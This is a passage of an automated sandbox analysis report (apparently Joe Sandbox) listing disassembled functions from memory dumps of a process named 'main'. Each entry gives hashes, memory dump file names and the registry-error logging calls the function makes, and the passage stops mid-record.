                                                                                                                                                  • Opcode Fuzzy Hash: 2421130e589a518d8d6a899e34f192d6eae1fdef6248c36e69ef4aa482b17227
                                                                                                                                                  • Instruction Fuzzy Hash: 0EF09662B0874642E5628F08B9807797264EF68795F480136FF5DC66A4EF3CD9999700
                                                                                                                                                  Function 00007FF6BE035938 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 0ea0f9f3e0855ebec4d02b887b4cf1966552980e8b767d39c0e2875b2443d339
                                                                                                                                                  • Instruction ID: 4199eae75add54dda9b687bc40969ae149288fa00b1ffe8a10ef9c47c0441d1f
                                                                                                                                                  • Opcode Fuzzy Hash: 0ea0f9f3e0855ebec4d02b887b4cf1966552980e8b767d39c0e2875b2443d339
                                                                                                                                                  • Instruction Fuzzy Hash: CFF09662B0874642E5628F08B9807797264FF68795F480236FF5DC66A4EF3CD999A300
                                                                                                                                                  Function 00007FF8BA4F8927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: d70ce53f65cbd76b3d812b6a3b7d7fa9ae657fd1b9d78e245efc284ed06115be
                                                                                                                                                  • Instruction ID: 3e1c6ad41886f5357b222c9f7c952e18a52d00739c72f353d49f1b9788ed9ef5
                                                                                                                                                  • Opcode Fuzzy Hash: d70ce53f65cbd76b3d812b6a3b7d7fa9ae657fd1b9d78e245efc284ed06115be
                                                                                                                                                  • Instruction Fuzzy Hash: D9F096A260860682E6628F48BC807756354BF457E5F48017AEF4D4A6A0EF3EEA899300
                                                                                                                                                  Function 00007FF8BA4F891D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: df9030146c483eeb1c42cd23e8c33ca0e0a20dd8f7b5618f4459904781ca7a31
                                                                                                                                                  • Instruction ID: ae5b54a2f91d97753da132aea2af3ec79c69aea597315cb971f608ff3101f2ab
                                                                                                                                                  • Opcode Fuzzy Hash: df9030146c483eeb1c42cd23e8c33ca0e0a20dd8f7b5618f4459904781ca7a31
                                                                                                                                                  • Instruction Fuzzy Hash: 31F0B15270C70641E5518F4CBC407757354BF457D5F480175EF4D4A690EF3EDA499300
                                                                                                                                                  Function 00007FF8BA4F89BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: e6d6454d9d8ed6389c828c79f8ce65ad1eb9fe4b924b38bced701f5c03ddeb45
                                                                                                                                                  • Instruction ID: 3e1052f18093d18c5877437656dfe6738b6fa5e36ccbf14346f9fd40e4a8a2a8
                                                                                                                                                  • Opcode Fuzzy Hash: e6d6454d9d8ed6389c828c79f8ce65ad1eb9fe4b924b38bced701f5c03ddeb45
                                                                                                                                                  • Instruction Fuzzy Hash: 03F0B15270C70642E5518F4CBC407757354BF457D5F480176EF4D4A690DF3EDA499700
                                                                                                                                                  Function 00007FF8BA4F89AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 1683aa44052c06ac712ff3a27e6fe50b9ff14011bc9dd6c1858f5456d2b15749
                                                                                                                                                  • Instruction ID: a749a143dd671a18bc01b1a3c1f5db27eab18df99053a79d7907a43525fcb360
                                                                                                                                                  • Opcode Fuzzy Hash: 1683aa44052c06ac712ff3a27e6fe50b9ff14011bc9dd6c1858f5456d2b15749
                                                                                                                                                  • Instruction Fuzzy Hash: 49F096A260870682E6628F48BC807756354AF457E5F48017AEF4D4A6A0EF3EEA899300
                                                                                                                                                  Function 00007FF8BA4F8A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 335d1d3817ec4d55ff377caf703831ab7f6be45e12ce3a8728bfb007799e5078
                                                                                                                                                  • Instruction ID: f8a0dd6171220db080a4657ebd17450e0e66495399d2f8a7f6c1ca997e4d1760
                                                                                                                                                  • Opcode Fuzzy Hash: 335d1d3817ec4d55ff377caf703831ab7f6be45e12ce3a8728bfb007799e5078
                                                                                                                                                  • Instruction Fuzzy Hash: 4EF096A260870682E6628F48BC807756354BF457E5F48027AEF4D4A6A0EF3EDA899300
                                                                                                                                                  Function 00007FF8B915B418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 29437ac4afbfda1d0549fadbdcd205bb5e1de10d9f53cd31b8a2290d1309ccbd
                                                                                                                                                  • Instruction ID: 74429e1f76944a5e09356b704ab23aa6a6212c393a85389d950b6235482401ca
                                                                                                                                                  • Opcode Fuzzy Hash: 29437ac4afbfda1d0549fadbdcd205bb5e1de10d9f53cd31b8a2290d1309ccbd
                                                                                                                                                  • Instruction Fuzzy Hash: 39F09662A1878642E5528F18F8403756254FF447E4F198236DF4D87690EF2CF989F700
                                                                                                                                                  Function 00007FF8B915B2FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: cace5ebabb9363b8966dec080f45c5113ce0fff2ffdb2ee5c196495c6adaa64c
                                                                                                                                                  • Instruction ID: 4a759241da14da64db076c28c99972bda0f9c313e3dd72f4964756aec9ee2d21
                                                                                                                                                  • Opcode Fuzzy Hash: cace5ebabb9363b8966dec080f45c5113ce0fff2ffdb2ee5c196495c6adaa64c
                                                                                                                                                  • Instruction Fuzzy Hash: 80F09062A1878A82E5528F18B8403B96254FF457E4F598236EF4D87690EF2CF989E700
                                                                                                                                                  Function 00007FF8B915B307 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 94c313a93f3fcc94334b073feae1166a67dda0c898543ef0da23008a7acd5d45
                                                                                                                                                  • Instruction ID: 3aec7a6c73b3824081ee5b6c46e0b6d8796d8e6b23bdcbb4fede6599e1dd3204
                                                                                                                                                  • Opcode Fuzzy Hash: 94c313a93f3fcc94334b073feae1166a67dda0c898543ef0da23008a7acd5d45
                                                                                                                                                  • Instruction Fuzzy Hash: 02F09062A1878A82E5528F18FC403B96254FF457E4F598236EF4D87690EF2CF989A700
                                                                                                                                                  Function 00007FF8B915B39C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: a6dc7d9a45d4f0885938b8d6bee443f9b6c71ed4e1913be312bb925606633a80
                                                                                                                                                  • Instruction ID: ba3e34913068421b90eb1d7be8f986b3289a8f101b106263f7b56e494a9a344a
                                                                                                                                                  • Opcode Fuzzy Hash: a6dc7d9a45d4f0885938b8d6bee443f9b6c71ed4e1913be312bb925606633a80
                                                                                                                                                  • Instruction Fuzzy Hash: C6F09062A1878A82E5528F18B8403B96254FF457E4F598236EF4D87690EF2CF989E700
                                                                                                                                                  Function 00007FF8B915B38E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                                                                                                                                                  • Instruction ID: 100a31e855ac35467210143eb3b9aa4aaf5623f089f314565573440b2f2f62bd
                                                                                                                                                  • Opcode Fuzzy Hash: 43a66c7a40e50f2705813a1cfc1b0f86665661e007711cb612dbde3ccfe57ede
                                                                                                                                                  • Instruction Fuzzy Hash: 04F09662A1878642E5538F18BC403796254FF457E4F598236DF4D87690EF2CF985E700
                                                                                                                                                  Function 00007FF8B918268D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                                                                                                                                                  • Instruction ID: 3ad469e133cbf741c7e98f467054f27528fef1372f08fb528ad6300068a82333
                                                                                                                                                  • Opcode Fuzzy Hash: 0ca799fca6bbcb1757cbcc2dcca85249b25f476f8fa3a6e87312bd06e934d07b
                                                                                                                                                  • Instruction Fuzzy Hash: 58F0F622A0878642E5538F0CB8803757244BF407E4F494635DF5D46691EF3DD986B300
                                                                                                                                                  Function 00007FF8B9182697 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                                                                                                                                                  • Instruction ID: 3cd975793e2593f46408d791bc155c68050fe39c0051fd6262389bd36191b347
                                                                                                                                                  • Opcode Fuzzy Hash: 5aa2f7c8573c3de0365c04b7b97fedeb54286f0fb7594e79099b212bd57f958c
                                                                                                                                                  • Instruction Fuzzy Hash: E3F0F022A0868642E6538F0CBC803B97244BF407E4F49463AEF5D46691EF3DDA8AB300
                                                                                                                                                  Function 00007FF8B918271E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                                                                                                                                                  • Instruction ID: acbda8544bbe563e28de5675648f70b184f3252f1e5b5923a141e5ae3e835372
                                                                                                                                                  • Opcode Fuzzy Hash: b64ba499165d0bf9f2a6abbdea868e445e23a4ee5814657b89a818d1230dab7a
                                                                                                                                                  • Instruction Fuzzy Hash: F5F0F622A0878642E5538F0CBC803757244FF407E4F494536DF5D46691DF3DDA86B300
                                                                                                                                                  Function 00007FF8B918272C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: b925a896082f3cbac8f85682289c0623576caa08c1e2f56db9f14118f2be1eb2
                                                                                                                                                  • Instruction ID: b0d9de61a816731c9345bbd97bc40bc011f2dbb4d13bec58fe18848e7f7ef728
